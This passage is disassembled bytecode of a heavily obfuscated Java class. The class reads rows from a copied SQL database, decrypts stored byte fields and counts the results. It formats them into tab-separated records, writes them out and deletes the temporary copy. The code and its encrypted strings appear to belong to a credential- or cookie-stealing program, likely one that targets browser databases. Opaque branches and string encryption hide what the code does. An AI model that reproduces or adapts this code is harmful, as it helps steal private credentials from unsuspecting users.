       682: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       685: ldc           #11                 // String /
       687: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       690: aload         14
       692: iconst_4
       693: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       698: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       701: iload         9
       703: ifne          812
       706: goto          710
       709: athrow
       710: pop
       711: goto          715
       714: athrow
       715: lload         7
       717: lconst_0
       718: lcmp
       719: iflt          785
       722: aload         16
       724: aload         14
       726: iconst_1
       727: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       732: invokeinterface #33,  2           // InterfaceMethod java/util/Map.containsKey:(Ljava/lang/Object;)Z
       737: ifeq          789
       740: aload         15
       742: ldc           #15                 // int 1349103510
       744: sipush        29074
       747: isub
       748: ldc           #2                  // int -1349103510
       750: sipush        -12411
       753: isub
       754: lload         7
       756: l2i
       757: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       760: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       763: aload         16
       765: aload         14
       767: iconst_1
       768: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       773: invokeinterface #197,  2          // InterfaceMethod java/util/Map.get:(Ljava/lang/Object;)Ljava/lang/Object;
       778: checkcast     #110                // class java/lang/String
       781: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       784: pop
       785: goto          789
       788: athrow
       789: aload         15
       791: ldc           #15                 // int 1349103510
       793: sipush        29069
       796: isub
       797: ldc           #15                 // int 1349103510
       799: sipush        25843
       802: isub
       803: lload         7
       805: l2i
       806: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       809: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       812: pop
       813: iload         9
       815: ifeq          531
       818: iload         9
       820: lload         7
       822: lconst_0
       823: lcmp
       824: ifle          2080
       827: lload         7
       829: lconst_0
       830: lcmp
       831: ifle          839
       834: ifeq          1782
       837: iload         6
       839: iload         9
       841: ifne          1169
       844: goto          848
       847: athrow
       848: iconst_4
       849: goto          853
       852: athrow
       853: if_icmpne     1158
       856: new           #241                // class java/text/SimpleDateFormat
       859: dup
       860: ldc           #15                 // int 1349103510
       862: sipush        29057
       865: isub
       866: ldc           #15                 // int 1349103510
       868: sipush        20920
       871: isub
       872: lload         7
       874: l2i
       875: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       878: invokespecial #138                // Method java/text/SimpleDateFormat."<init>":(Ljava/lang/String;)V
       881: astore        16
       883: aload         14
       885: invokeinterface #213,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       890: ifeq          1139
       893: aload         14
       895: iconst_4
       896: invokeinterface #313,  2          // InterfaceMethod java/sql/ResultSet.getLong:(I)J
       901: lstore        17
       903: lload         17
       905: lconst_0
       906: lcmp
       907: iload         9
       909: ifne          1794
       912: ifle          963
       915: goto          919
       918: athrow
       919: aload         16
       921: new           #179                // class java/util/Date
       924: dup
       925: lload         17
       927: sipush        21759
       930: ldc2_w        #367                // long 9183259059517505505l
       933: lload         7
       935: lxor
       936: invokestatic  #117                // Method a:(IJ)J
       939: ldiv
       940: sipush        3424
       943: ldc2_w        #369                // long 7232345871814813311l
       946: lload         7
       948: lxor
       949: invokestatic  #117                // Method a:(IJ)J
       952: lsub
       953: invokespecial #257                // Method java/util/Date."<init>":(J)V
       956: invokevirtual #45                 // Method java/text/SimpleDateFormat.format:(Ljava/util/Date;)Ljava/lang/String;
       959: goto          981
       962: athrow
       963: ldc           #15                 // int 1349103510
       965: sipush        29075
       968: isub
       969: ldc           #2                  // int -1349103510
       971: sipush        -16990
       974: isub
       975: lload         7
       977: l2i
       978: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       981: astore        19
       983: aload         15
       985: ldc           #15                 // int 1349103510
       987: sipush        29036
       990: isub
       991: ldc           #2                  // int -1349103510
       993: sipush        -25002
       996: i2c
       997: ineg
       998: isub
       999: lload         7
      1001: l2i
      1002: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1005: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1008: aload         14
      1010: iconst_1
      1011: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1016: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1019: ldc           #15                 // int 1349103510
      1021: sipush        29066
      1024: isub
      1025: ldc           #15                 // int 1349103510
      1027: sipush        28226
      1030: isub
      1031: lload         7
      1033: l2i
      1034: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1037: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1040: aload         14
      1042: iconst_2
      1043: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1048: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1051: ldc           #15                 // int 1349103510
      1053: sipush        29070
      1056: isub
      1057: ldc           #2                  // int -1349103510
      1059: sipush        -18144
      1062: isub
      1063: lload         7
      1065: l2i
      1066: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1069: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1072: aload         14
      1074: iconst_3
      1075: invokeinterface #278,  2          // InterfaceMethod java/sql/ResultSet.getInt:(I)I
      1080: invokevirtual #240                // Method java/lang/StringBuilder.append:(I)Ljava/lang/StringBuilder;
      1083: ldc           #15                 // int 1349103510
      1085: sipush        29077
      1088: isub
      1089: ldc           #2                  // int -1349103510
      1091: sipush        -31366
      1094: i2c
      1095: ineg
      1096: isub
      1097: lload         7
      1099: l2i
      1100: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1103: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1106: aload         19
      1108: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1111: ldc           #15                 // int 1349103510
      1113: sipush        29034
      1116: isub
      1117: ldc           #15                 // int 1349103510
      1119: sipush        -27356
      1122: i2c
      1123: isub
      1124: lload         7
      1126: l2i
      1127: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1130: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1133: pop
      1134: iload         9
      1136: ifeq          883
      1139: iload         9
      1141: lload         7
      1143: lconst_0
      1144: lcmp
      1145: ifle          1794
      1148: lload         7
      1150: lconst_0
      1151: lcmp
      1152: iflt          1165
      1155: ifeq          1782
      1158: aload         14
      1160: invokeinterface #213,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
      1165: goto          1169
      1168: athrow
      1169: ifeq          1782
      1172: iload         6
      1174: lload         7
      1176: lconst_0
      1177: lcmp
      1178: ifle          1794
      1181: iload         9
      1183: ifne          1794
      1186: iconst_1
      1187: iload         9
      1189: lload         7
      1191: lconst_0
      1192: lcmp
      1193: iflt          1389
      1196: ifne          1387
      1199: goto          1203
      1202: athrow
      1203: if_icmpne     1384
      1206: goto          1210
      1209: athrow
      1210: aload         14
      1212: iconst_3
      1213: invokeinterface #236,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
      1218: invokestatic  #53                 // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
      1221: astore        16
      1223: aload         16
      1225: lload         7
      1227: lconst_0
      1228: lcmp
      1229: iflt          1246
      1232: iload         9
      1234: ifne          1246
      1237: ifnull        1372
      1240: goto          1244
      1243: athrow
      1244: aload         16
      1246: invokevirtual #206                // Method java/lang/String.isEmpty:()Z
      1249: iload         9
      1251: ifne          1270
      1254: ifne          1372
      1257: goto          1261
      1260: athrow
      1261: getstatic     #178                // Field J:I
      1264: iconst_1
      1265: iadd
      1266: goto          1270
      1269: athrow
      1270: putstatic     #178                // Field J:I
      1273: aload         15
      1275: ldc           #15                 // int 1349103510
      1277: sipush        29078
      1280: isub
      1281: ldc           #2                  // int -1349103510
      1283: sipush        -22990
      1286: isub
      1287: lload         7
      1289: l2i
      1290: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1293: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1296: aload         14
      1298: iconst_1
      1299: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1304: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1307: ldc           #6                  // String \n
      1309: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1312: aload         14
      1314: iconst_2
      1315: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1320: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1323: ldc           #15                 // int 1349103510
      1325: sipush        29048
      1328: isub
      1329: ldc           #15                 // int 1349103510
      1331: sipush        13329
      1334: isub
      1335: lload         7
      1337: l2i
      1338: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1341: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1344: aload         16
      1346: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1349: ldc           #15                 // int 1349103510
      1351: sipush        29034
      1354: isub
      1355: ldc           #15                 // int 1349103510
      1357: sipush        -27356
      1360: i2c
      1361: isub
      1362: lload         7
      1364: l2i
      1365: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1368: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1371: pop
      1372: iload         9
      1374: lload         7
      1376: lconst_0
      1377: lcmp
      1378: ifle          1386
      1381: ifeq          1158
      1384: iload         6
      1386: iconst_2
      1387: iload         9
      1389: ifne          1652
      1392: if_icmpne     1644
      1395: goto          1399
      1398: athrow
      1399: aload         14
      1401: iconst_5
      1402: invokeinterface #236,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
      1407: aload         14
      1409: iconst_1
      1410: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1415: invokestatic  #56                 // Method a/b/d/dec.k3l:([BLjava/lang/String;)Ljava/lang/String;
      1418: astore        16
      1420: lload         7
      1422: lconst_0
      1423: lcmp
      1424: ifle          1453
      1427: iload         9
      1429: ifne          1453
      1432: aload         16
      1434: ifnull        1632
      1437: goto          1441
      1440: athrow
      1441: getstatic     #94                 // Field I:I
      1444: iconst_1
      1445: iadd
      1446: putstatic     #94                 // Field I:I
      1449: goto          1453
      1452: athrow
      1453: aload         15
      1455: aload         14
      1457: iconst_1
      1458: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1463: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1466: ldc           #15                 // int 1349103510
      1468: sipush        29065
      1471: isub
      1472: ldc           #15                 // int 1349103510
      1474: sipush        15011
      1477: isub
      1478: lload         7
      1480: l2i
      1481: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1484: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1487: aload         14
      1489: iconst_3
      1490: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1495: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1498: lload         7
      1500: lconst_0
      1501: lcmp
      1502: iflt          1515
      1505: ldc           #5                  // String \t
      1507: iload         9
      1509: ifne          1560
      1512: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1515: aload         14
      1517: iconst_4
      1518: invokeinterface #278,  2          // InterfaceMethod java/sql/ResultSet.getInt:(I)I
      1523: iconst_1
      1524: lload         7
      1526: lconst_0
      1527: lcmp
      1528: ifle          1575
      1531: if_icmpne     1563
      1534: goto          1538
      1537: athrow
      1538: ldc           #15                 // int 1349103510
      1540: sipush        29058
      1543: isub
      1544: ldc           #15                 // int 1349103510
      1546: sipush        18978
      1549: isub
      1550: lload         7
      1552: l2i
      1553: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1556: goto          1560
      1559: athrow
      1560: goto          1581
      1563: ldc           #15                 // int 1349103510
      1565: sipush        29035
      1568: isub
      1569: ldc           #15                 // int 1349103510
      1571: sipush        25023
      1574: isub
      1575: lload         7
      1577: l2i
      1578: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1581: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1584: ldc           #15                 // int 1349103510
      1586: sipush        29046
      1589: isub
      1590: ldc           #2                  // int -1349103510
      1592: sipush        -20715
      1595: isub
      1596: lload         7
      1598: l2i
      1599: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1602: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1605: aload         14
      1607: iconst_2
      1608: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1613: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1616: ldc           #5                  // String \t
      1618: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1621: aload         16
      1623: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1626: ldc           #6                  // String \n
      1628: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1631: pop
      1632: iload         9
      1634: lload         7
      1636: lconst_0
      1637: lcmp
      1638: ifle          1646
      1641: ifeq          1158
      1644: iload         6
      1646: iload         9
      1648: ifne          1169
      1651: iconst_3
      1652: if_icmpne     1158
      1655: aload         14
      1657: iconst_2
      1658: invokeinterface #236,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
      1663: invokestatic  #53                 // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
      1666: astore        16
      1668: iload         9
      1670: ifne          1694
      1673: aload         16
      1675: ifnull        1777
      1678: goto          1682
      1681: athrow
      1682: getstatic     #224                // Field g:I
      1685: iconst_1
      1686: iadd
      1687: putstatic     #224                // Field g:I
      1690: goto          1694
      1693: athrow
      1694: aload         15
      1696: ldc           #15                 // int 1349103510
      1698: sipush        29049
      1701: isub
      1702: ldc           #15                 // int 1349103510
      1704: sipush        32537
      1707: isub
      1708: lload         7
      1710: l2i
      1711: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1714: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1717: aload         14
      1719: iconst_1
      1720: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1725: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1728: ldc           #15                 // int 1349103510
      1730: sipush        29024
      1733: isub
      1734: ldc           #15                 // int 1349103510
      1736: sipush        16844
      1739: isub
      1740: lload         7
      1742: l2i
      1743: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1746: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1749: aload         16
      1751: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1754: ldc           #15                 // int 1349103510
      1756: sipush        29034
      1759: isub
      1760: ldc           #15                 // int 1349103510
      1762: sipush        -27356
      1765: i2c
      1766: isub
      1767: lload         7
      1769: l2i
      1770: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1773: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1776: pop
      1777: iload         9
      1779: ifeq          1158
      1782: lload         7
      1784: lconst_0
      1785: lcmp
      1786: iflt          1172
      1789: aload         15
      1791: invokevirtual #214                // Method java/lang/StringBuilder.length:()I
      1794: ifle          1847
      1797: aload         4
      1799: aload         5
      1801: ldc           #15                 // int 1349103510
      1803: sipush        29052
      1806: isub
      1807: ldc           #15                 // int 1349103510
      1809: sipush        16002
      1812: isub
      1813: lload         7
      1815: l2i
      1816: invokestatic  #354                // Method a:(III)Ljava/lang/String;
      1819: dup_x2
      1820: pop
      1821: ldc           #11                 // String /
      1823: swap
      1824: invokedynamic #120,  0            // InvokeDynamic #2:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
      1829: goto          1833
      1832: athrow
      1833: aload         15
      1835: invokevirtual #164                // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
      1838: getstatic     #228                // Field java/nio/charset/StandardCharsets.UTF_8:Ljava/nio/charset/Charset;
      1841: invokevirtual #44                 // Method java/lang/String.getBytes:(Ljava/nio/charset/Charset;)[B
      1844: invokestatic  #100                // Method a/b/c/z.a:(Ljava/lang/String;[B)V
      1847: lload         7
      1849: lconst_0
      1850: lcmp
      1851: iflt          1875
      1854: aload         14
      1856: iload         9
      1858: ifne          1870
      1861: ifnull        1923
      1864: goto          1868
      1867: athrow
      1868: aload         14
      1870: invokeinterface #314,  1          // InterfaceMethod java/sql/ResultSet.close:()V
      1875: goto          1923
      1878: astore        15
      1880: lload         7
      1882: lconst_0
      1883: lcmp
      1884: iflt          1908
      1887: aload         14
      1889: iload         9
      1891: ifne          1903
      1894: ifnull        1920
      1897: goto          1901
      1900: athrow
      1901: aload         14
      1903: invokeinterface #314,  1          // InterfaceMethod java/sql/ResultSet.close:()V
      1908: goto          1920
      1911: astore        16
      1913: aload         15
      1915: aload         16
      1917: invokevirtual #84                 // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      1920: aload         15
      1922: athrow
      1923: lload         7
      1925: lconst_0
      1926: lcmp
      1927: iflt          1951
      1930: aload         13
      1932: iload         9
      1934: ifne          1946
      1937: ifnull        1999
      1940: goto          1944
      1943: athrow
      1944: aload         13
      1946: invokeinterface #344,  1          // InterfaceMethod java/sql/Statement.close:()V
      1951: goto          1999
      1954: astore        14
      1956: lload         7
      1958: lconst_0
      1959: lcmp
      1960: iflt          1984
      1963: aload         13
      1965: iload         9
      1967: ifne          1979
      1970: ifnull        1996
      1973: goto          1977
      1976: athrow
      1977: aload         13
      1979: invokeinterface #344,  1          // InterfaceMethod java/sql/Statement.close:()V
      1984: goto          1996
      1987: astore        15
      1989: aload         14
      1991: aload         15
      1993: invokevirtual #84                 // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      1996: aload         14
      1998: athrow
      1999: lload         7
      2001: lconst_0
      2002: lcmp
      2003: ifle          2027
      2006: aload         12
      2008: iload         9
      2010: ifne          2022
      2013: ifnull        2075
      2016: goto          2020
      2019: athrow
      2020: aload         12
      2022: invokeinterface #99,  1           // InterfaceMethod java/sql/Connection.close:()V
      2027: goto          2075
      2030: astore        13
      2032: lload         7
      2034: lconst_0
      2035: lcmp
      2036: iflt          2060
      2039: aload         12
      2041: iload         9
      2043: ifne          2055
      2046: ifnull        2072
      2049: goto          2053
      2052: athrow
      2053: aload         12
      2055: invokeinterface #99,  1           // InterfaceMethod java/sql/Connection.close:()V
      2060: goto          2072
      2063: astore        14
      2065: aload         13
      2067: aload         14
      2069: invokevirtual #84                 // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      2072: aload         13
      2074: athrow
      2075: aload         11
      2077: invokevirtual #227                // Method java/io/File.delete:()Z
      2080: pop
      2081: goto          2106
      2084: astore        12
      2086: aload         11
      2088: invokevirtual #227                // Method java/io/File.delete:()Z
      2091: pop
      2092: goto          2106
      2095: astore        20
      2097: aload         11
      2099: invokevirtual #227                // Method java/io/File.delete:()Z
      2102: pop
      2103: aload         20
      2105: athrow
      2106: return
      Exception table:
         from    to  target type
           409   433   436   Class java/lang/Throwable
           400   412   415   Class java/lang/Throwable
           386   405   408   Class java/lang/Throwable
           142   152   155   Class java/lang/Throwable
            95   110   113   Class java/lang/Throwable
            88   102   105   Class java/lang/Throwable
            78    91    94   Class java/lang/Throwable
           363   443   481   Class java/lang/Throwable
           504   511   514   Class java/lang/Throwable
           483   500   503   Class java/lang/Throwable
           443   467   470   Class java/lang/Throwable
           331   526   529   Class java/lang/Exception
          1794  1829  1832   Class java/lang/Throwable
          1673  1690  1693   Class java/lang/Throwable
          1668  1678  1681   Class java/lang/Throwable
          1512  1556  1559   Class java/lang/Throwable
          1453  1534  1537   Class java/lang/Throwable
          1432  1449  1452   Class java/lang/Throwable
          1420  1437  1440   Class java/lang/Throwable
          1387  1395  1398   Class java/lang/Throwable
          1254  1266  1269   Class java/lang/Throwable
          1246  1257  1260   Class java/lang/Throwable
          1223  1240  1243   Class java/lang/Throwable
          1186  1206  1209   Class java/lang/Throwable
          1172  1199  1202   Class java/lang/Throwable
          1139  1165  1168   Class java/lang/Throwable
           912   962   962   Class java/lang/Throwable
           903   915   918   Class java/lang/Throwable
           837   849   852   Class java/lang/Throwable
           818   844   847   Class java/lang/Throwable
           715   785   788   Class java/lang/Throwable
           584   711   714   Class java/lang/Throwable
           577   706   709   Class java/lang/Throwable
           566   580   583   Class java/lang/Throwable
           554   573   576   Class java/lang/Throwable
           307   318   321   Class java/lang/Throwable
           298  1847  1878   Class java/lang/Throwable
          1901  1908  1911   Class java/lang/Throwable
          1880  1897  1900   Class java/lang/Throwable
          1847  1864  1867   Class java/lang/Throwable
           288  1923  1954   Class java/lang/Throwable
          1977  1984  1987   Class java/lang/Throwable
          1956  1973  1976   Class java/lang/Throwable
          1923  1940  1943   Class java/lang/Throwable
           279  1999  2030   Class java/lang/Throwable
          2053  2060  2063   Class java/lang/Throwable
           197   238  2084   Class java/lang/Exception
          2032  2049  2052   Class java/lang/Throwable
          1999  2016  2019   Class java/lang/Throwable
           245  2075  2084   Class java/lang/Exception
           197   238  2095   any
           245  2075  2095   any
          2084  2086  2095   any
          2095  2097  2095   any

  static {};
    Code:
         0: ldc2_w        #379                // long 123730648811253l
         3: lstore        6
         5: bipush        57
         7: anewarray     #110                // class java/lang/String
        10: astore        13
        12: iconst_0
        13: istore        11
        15: ldc           #3                  // String û¤À\u0000\u0004·Mñ\u000f\u0080\u0005y7s&s\r\rF*\u0007ÍrV|µ8{\u0000É¿­ë\u0002\u0087\u0007\u0092æ`W\u009f:pKûr\u0012Õ\u007f\u0013\u008es\u0086\u009d¸%âÕ*}ê\u008c\']ÙµU\tÄT \u007f\u000b;­l\u008ajÒ\u0007>\u0080Éº\u0087q]\u0011Ùck\u009admXa\u0000\u0013ë\u0080ªX6P8\u009dâ9\u0017I\u0010Ç\u0094\u001ayÄÜN\u0017\u0003×ç$\u0006¯\u0090ðI\u00032\nÛ\u0088ÁÉfMAL\u0091½\t÷W\u0001Õ3¸$$)\u0007ë\u000f\u0005;ð\u0014C\t\u0084nª\u0011Ã[%\u000b\u0098\u0002ï\r\t.\u0095ãk~ØùH\"\u0007\u0092{sBÎÀ\u009b\b~\u0086õI-¦\u0014\u009d\u0006WÆ\u0088`÷ê\u0006\u008boï5£\u0081Rl\u0014à\u0019!\u008aEGâæ\u0099%²\u001f\u0089\u0007_\u0014\u0015\\àÇô9è\u0096(nà\fS©¿ôã\u0082\u0000ö#\u008c\u009e\u009e\u000bïhuõ\u0014\u0005Tí°\u009534\u0092ó\u0087^G\u008bplç÷\u008c\u0088­\u008eõ;É¾_ê||Og\u001a¼Ï\ttàÏ\u0006\r\u0016¢ñÛ /JZ¹ü\u008féOw®+³î÷U\u009f4gþð\u001d¢®\u0001ýÿÀÅà!%\\\rP2\u000fÁæÃTð\u0019Éy\u0011±\u000b\t }Îÿª¢\u0012<É:\u0004B.Û«\u0013\u001fWÔöZÕäÓ\u001d\u008eXÊwHb\u0018®\u0083`\tg\u0086\u0013ïqÿlÌ \u0004|rà\u008b\r?wÖã\u000b\u001eà\u0085Rn\u0010å\u009c.ú\u00052;{Î\u000eÉ\u0085ï«ª\u008cÕTÃ¯Zæ\u0017bzÉ¬\u0082Y\t:é\u0003¢ÜÅÁ¤YÀµ®\\üU£@ª\u0013\u0013l*ð=TK\u008fsã$õü¢]è¦HüÙ\n\u0098¦©\fkõà[¥_\u0007\u0088àMÆù«b\u0007\u008c¥b¯Z>é\u0003ö\u001dÂ\u00076~ìÌT\u0001\u001b\fÅy½Q¨\u0011\u0099\"×<M¦\u0007Y°\u0099\u008dW\u0080/\u000f\u009e¿8z)´¦V\u0090je\u001fWê}\tqcõS­fÓ!`\b¨\u00044\u0007¡\u001b\u0098ë\u000fo*\u0006Èîâ^\u009c\u008f3\u00864+\u008fò\u000bÍ[\u0093h»\u0095æ\u0000ÿ\u008bB\f\u0002¡\u001d\u008c\fýçnË@ks@\u0084ïýf\u0082e1µvLBZ\u0090Ë×\u0000ß\"è\u0018£\u009bñï¡\u009c\u008e(\u0007HÚ!~Ý\flÉîb#Û\u0081ñ{P\u009dä%~OL\u0012Ùë¹×åsC\u0005E;\u0000«\u0007þ\u0089òX\u000eÝ\u008a(kÀÒ\u008cF&\u0005Ã\u0006Æ$±\u0013j¢P\u009diT¦E\\:duó\u0019³$Ð;\u008e{f\u0095£ªßD¥\u0005<\n]H\u0090\u0002£ÀsÍ\u0012ÔÙ§\u0092\u0095Kâ\u0093Ð¡Â\u0099½ü\u00873í¬\nõ\u0095Û¨ÐÍ¼E/®ÚK\u0003\'UÏo\u0004\u008d>-¬rÈ±þ\u009f«_Q»=Y\u009d\u009cÉC\u0016à\u0018\u0010\u0083Ç\tÝ\u0003½< \u000ev_<\u009e.\u001c9\u0014fkÝ¬§y×,W×Sç\u0083\u0086\u0000¦<KÇ\u0083\u008f©\u0097\be=fþtp.\u0087z-gò\bp\u0014ÉXè^ÏG\u0007~z\u0093\u0095\"Á\u0019bò\f3\u001a[ê\nV\u0016eáÖñý\u0010\u0096\u0085,âJ{\"C5@\u0084Ã\u00804¾\u0011>\\\u0092sË-íKÍTº1Øã¿æ\u000796ç\u008bI[o¶\u0002\u0016\n\u0087\u0018½÷Ú¥>­bà´\u0085Õ$Tô·\u009dM<l#\u0017\u0094\u0005S>ÜíGÀ\n\u0091ðjÂâo0\t+\u000f¾ÞÄ×þ\u0017Å\u000b¶Q¤A\u008f¤\u009c¯ËÄ\u0005\u0013\u0019\u008d^É\u0081Õ5 ´^\u001f³ÿ´C\u009b=[w\b¶5\u0011|óÚ¬×\u000eõÌ÷\u0086Óä\u0094VeT\u0015\u0095¥B\b\u0013÷P=\u00893º/
        17: dup
        18: astore        10
        20: invokevirtual #185                // Method java/lang/String.length:()I
        23: istore        12
        25: bipush        35
        27: istore        9
        29: iconst_m1
        30: istore        8
        32: iinc          8, 1
        35: aload         10
        37: iload         8
        39: dup
        40: iload         9
        42: iadd
        43: invokevirtual #271                // Method java/lang/String.substring:(II)Ljava/lang/String;
        46: iconst_m1
        47: goto          184
        50: aload         13
        52: swap
        53: iload         11
        55: iinc          11, 1
        58: swap
        59: aastore
        60: iload         8
        62: iload         9
        64: iadd
        65: dup
        66: istore        8
        68: iload         12
        70: if_icmpge     85
        73: aload         10
        75: iload         8
        77: invokevirtual #275                // Method java/lang/String.charAt:(I)C
        80: istore        9
        82: goto          32
        85: ldc           #10                 // String ¨1>\u00881_)Ã¢ÇÀä¯Qò\u008càuu9òçC5\u000bAêçÕnUÿÕHw\u000eH~\u009dÓ\u0004\u0080ô;l|Ìv
        87: dup
        88: astore        10
        90: invokevirtual #185                // Method java/lang/String.length:()I
        93: istore        12
        95: bipush        6
        97: istore        9
        99: iconst_m1
       100: istore        8
       102: iinc          8, 1
       105: aload         10
       107: iload         8
       109: dup
       110: iload         9
       112: iadd
       113: invokevirtual #271                // Method java/lang/String.substring:(II)Ljava/lang/String;
       116: iconst_0
       117: goto          184
       120: aload         13
       122: swap
       123: iload         11
       125: iinc          11, 1
       128: swap
       129: aastore
       130: iload         8
       132: iload         9
       134: iadd
       135: dup
       136: istore        8
       138: iload         12
       140: if_icmpge     155
       143: aload         10
       145: iload         8
       147: invokevirtual #275                // Method java/lang/String.charAt:(I)C
       150: istore        9
       152: goto          102
       155: aload         13
       157: putstatic     #73                 // Field a:[Ljava/lang/String;
       160: bipush        57
       162: anewarray     #110                // class java/lang/String
       165: putstatic     #71                 // Field b:[Ljava/lang/String;
       168: ldc           #19                 // int -1230952847
       170: ldc           #17                 // int -1230949948
       172: lload         6
       174: l2i
       175: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       178: putstatic     #124                // Field s:Ljava/lang/String;
       181: goto          336
       184: swap
       185: invokevirtual #330                // Method java/lang/String.toCharArray:()[C
       188: dup
       189: arraylength
